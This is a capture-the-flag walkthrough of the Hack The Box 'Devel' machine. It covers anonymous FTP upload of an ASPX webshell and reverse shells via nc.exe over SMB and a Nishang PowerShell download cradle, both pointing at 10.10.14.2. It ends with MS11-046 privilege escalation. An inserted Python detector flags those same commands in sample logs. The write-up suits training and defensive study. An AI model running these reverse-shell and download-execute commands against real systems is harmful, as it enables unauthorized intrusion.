Following on from Blue in number of pwns is Devel. I’m going in blind.
Just FTP and HTTP on this one. The detailed scan says anonymous FTP is allowed and the webserver is Microsoft IIS httpd 7.5.
We can log in to FTP and put files. I’m far, far from expert at Windows, but I copy the included aspx webshell from the default Kali installation and upload it. With this I can run commands in the browser, but I’m a low-privileged user:
I upload winpeas.bat but I’m not entirely sure where to go next. I go get the Windows Exploit Suggester - Next Generation, clone it and run it against the output of systeminfo on the box, which shows, amongst other things:
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
The WES script says:
Installed hotfixes: None
And it comes up with 236 potential vulnerabilities. Wew lad.
Even though there are apparently myriad opportunities for moving forward, it’s not clear to me what the best thing to do is. I consult a thorough writeup from 0xdf.
0xdf shows a method for copying files to the Windows host using netcat. It’s not entirely necessary in this case since we can just use the FTP upload but it’s good practice. We use a python SMB server:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share smb
We need the compiled nc binary to copy to the box:
cp /usr/share/windows-resources/binaries/nc.exe .
We need a listener:
nc -lnvp 443
And we send this to the webshell:
\\10.10.14.2\share\nc.exe -e cmd.exe 10.10.14.2 443
And … nothing. Actually that’s not true; I can see it is transferring the file over the SMB server but it’s not triggering the reverse shell.
I check some other resources, kill my SMB server and try again:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py ROPNOP ./
Now I can run this on the webshell:
And I can see my files. Let’s try this on the webshell:
\\10.10.14.2\ROPNOP\nc.exe -e cmd.exe 10.10.14.2 443
Executing files from SMB. Because of the way Windows treats UNC paths, it’s possible to just execute our binary directly from the SMB share without even needing to copy it over first. Just run the executable as if it were already local and the payload will fire.
Alternative via Nishang
0xdf recommends Nishang. I clone the repo to /opt/nishang. We copy one of the shells to our local directory:
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
We have to edit the file, by copying the example line from it to the bottom of the script and editing the host and port:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443
So the shell definition is in the body of the script, and the call is the line we added. Next, we kill our nc shell (we don’t actually use it) and restart the listener, start a python server and send this call to the webshell:
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/Invoke-PowerShellTcp.p
We’ll see these things:
Okay, now we have a powershell reverse shell instead.
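The two tricks used above, launching a binary straight from a UNC path and the PowerShell download cradle, both leave distinctive marks in process-creation telemetry. As an added example (not from the original post), here is a small Python checker that runs over a few constructed process-creation records in a simplified key=value shape loosely modelled on Windows 4688 / Sysmon Event 1 fields; the record format, field names and sample lines are assumptions, not real logs from the box.

```python
import re

# Constructed sample process-creation records (assumed key=value shape, not real box logs).
SAMPLE_EVENTS = [
    r"Parent=C:\Windows\System32\inetsrv\w3wp.exe Image=C:\Windows\System32\cmd.exe "
    r"CommandLine=cmd.exe /c \\10.10.14.2\ROPNOP\nc.exe -e cmd.exe 10.10.14.2 443",
    r"Parent=C:\Windows\System32\inetsrv\w3wp.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/Invoke-PowerShellTcp.ps1')",
    r"Parent=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe "
    r"CommandLine=notepad.exe C:\Users\Public\notes.txt",
    r"Parent=C:\Windows\System32\services.exe Image=C:\Windows\System32\svchost.exe "
    r"CommandLine=svchost.exe -k netsvcs",
]

RECORD = re.compile(r"Parent=(?P<parent>\S+) Image=(?P<image>\S+) CommandLine=(?P<cmdline>.*)$")
# A UNC path (\\host\share\...) ending in an executable extension anywhere in the command line.
UNC_EXEC = re.compile(r"\\\\[\w.\-]+\\[^\s\\]+\\\S+\.(?:exe|bat|cmd|ps1|dll)\b", re.I)
# The in-memory download cradle: a WebClient fetch handed to iex / Invoke-Expression.
CRADLE = re.compile(r"(?=.*net\.webclient)(?=.*download(?:string|file))(?=.*\b(?:iex|invoke-expression)\b)", re.I)
WEB_WORKERS = {"w3wp.exe"}            # IIS worker process: the parent of anything an ASPX webshell runs
SHELLS = {"cmd.exe", "powershell.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(line):
    """Return the list of detection reasons that fire for one record (empty if nothing fires)."""
    m = RECORD.match(line)
    if not m:
        return ["unparseable record"]
    parent, image, cmdline = basename(m["parent"]), basename(m["image"]), m["cmdline"]
    reasons = []
    if parent in WEB_WORKERS and image in SHELLS:
        reasons.append("web worker spawned an interactive shell (webshell indicator)")
    if UNC_EXEC.search(cmdline):
        reasons.append("executable launched directly from a UNC path")
    if CRADLE.search(cmdline):
        reasons.append("PowerShell download cradle (WebClient + iex)")
    return reasons

def scan(events):
    """Map record index -> reasons, keeping only the records that fired."""
    return {i: r for i, r in ((i, classify(e)) for i, e in enumerate(events)) if r}

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(i, "; ".join(reasons))
```

On the samples, only the two records spawned by w3wp.exe fire, each for two reasons; the regexes are deliberately narrow, so a real deployment would widen the cradle pattern to cover other download methods.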
0xdf also shows a meterpreter reverse shell but I’ll ignore that for now.
0xdf runs a different vulnerability scanner called Watson, which shows some potential privesc methods. I’m not sure how he chose which one to use, but it’s MS11-046 using a precompiled binary from here.
I copy it over like he does, and try to run it with the nc shell (powershell version won’t run it apparently) and it … doesn’t work. I get this message:
Program too big to fit in memory
Googling this error message mostly shows people rebooting or whatever; I won’t be doing that. Now what?
There is source code for an exploit for MS11-046 in searchsploit. We need to mirror it and compile it, but first we need to install mingw-w64. Here’s an excerpt from my history showing the relevant commands:
And it’s bing, bang, rama-a-lama ding dong!
Next is OpenAdmin, but I’ve already done that one when it was live. I’ll move onto Netmon, which I’ve never done.